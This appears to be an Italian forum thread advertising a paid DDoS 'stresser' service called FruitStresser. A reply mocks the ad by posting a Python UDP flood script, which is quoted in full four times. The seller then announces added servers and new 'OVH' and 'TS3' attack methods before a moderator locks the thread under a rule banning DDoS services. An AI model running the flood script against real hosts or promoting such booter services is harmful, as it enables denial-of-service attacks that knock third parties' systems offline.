DoS FruitStresser.NET | 10Gbps | L4 | Great Price

Stato
Discussione chiusa ad ulteriori risposte.
:rofl:
Codice:
#!usr/bin/env python

import os
import sys
import socket
UDP_IP = raw_input("Enter target IP: ")
UDP_PORT = 25
MESSAGE = raw_input("Message to send: ")

print "Initiating UDP flood attack against %s on port %s" % (UDP_IP, UDP_PORT)

sent = 0

while True:

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(MESSAGE, (UDP_IP, UDP_PORT))
    sent = sent + 1
    print "Sent %s UDP packets against %s on port %s" % (sent, UDP_IP, UDP_PORT)
solo un esempio di quanto valgono 3 euro oggi :)
 
:rofl:
Codice:
#!usr/bin/env python

import os
import sys
import socket
UDP_IP = raw_input("Enter target IP: ")
UDP_PORT = 25
MESSAGE = raw_input("Message to send: ")

print "Initiating UDP flood attack against %s on port %s" % (UDP_IP, UDP_PORT)

sent = 0

while True:

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(MESSAGE, (UDP_IP, UDP_PORT))
    sent = sent + 1
    print "Sent %s UDP packets against %s on port %s" % (sent, UDP_IP, UDP_PORT)
solo un esempio di quanto valgono 3 euro oggi :)
non l'ho capita
 
:rofl:
Codice:
#!usr/bin/env python

import os
import sys
import socket
UDP_IP = raw_input("Enter target IP: ")
UDP_PORT = 25
MESSAGE = raw_input("Message to send: ")

print "Initiating UDP flood attack against %s on port %s" % (UDP_IP, UDP_PORT)

sent = 0

while True:

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(MESSAGE, (UDP_IP, UDP_PORT))
    sent = sent + 1
    print "Sent %s UDP packets against %s on port %s" % (sent, UDP_IP, UDP_PORT)
solo un esempio di quanto valgono 3 euro oggi :)
:/ no
 
:rofl:
Codice:
#!usr/bin/env python

import os
import sys
import socket
UDP_IP = raw_input("Enter target IP: ")
UDP_PORT = 25
MESSAGE = raw_input("Message to send: ")

print "Initiating UDP flood attack against %s on port %s" % (UDP_IP, UDP_PORT)

sent = 0

while True:

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(MESSAGE, (UDP_IP, UDP_PORT))
    sent = sent + 1
    print "Sent %s UDP packets against %s on port %s" % (sent, UDP_IP, UDP_PORT)
solo un esempio di quanto valgono 3 euro oggi :)
Non vedo cosa mi rappresenti quel codice, visto che non è presente all' interno dello stresser.

AGGIORNAMENTO
+
2 Server (adesso 6 in totale)
+ OVH Method
+ TS3 Method
 
E’ vietato vendere/scambiare i seguenti prodotti: .... servizi/hosting finalizzati all’esecuzione di attacchi a negazione di servizio (DDoS).
Lock.
 
Stato
Discussione chiusa ad ulteriori risposte.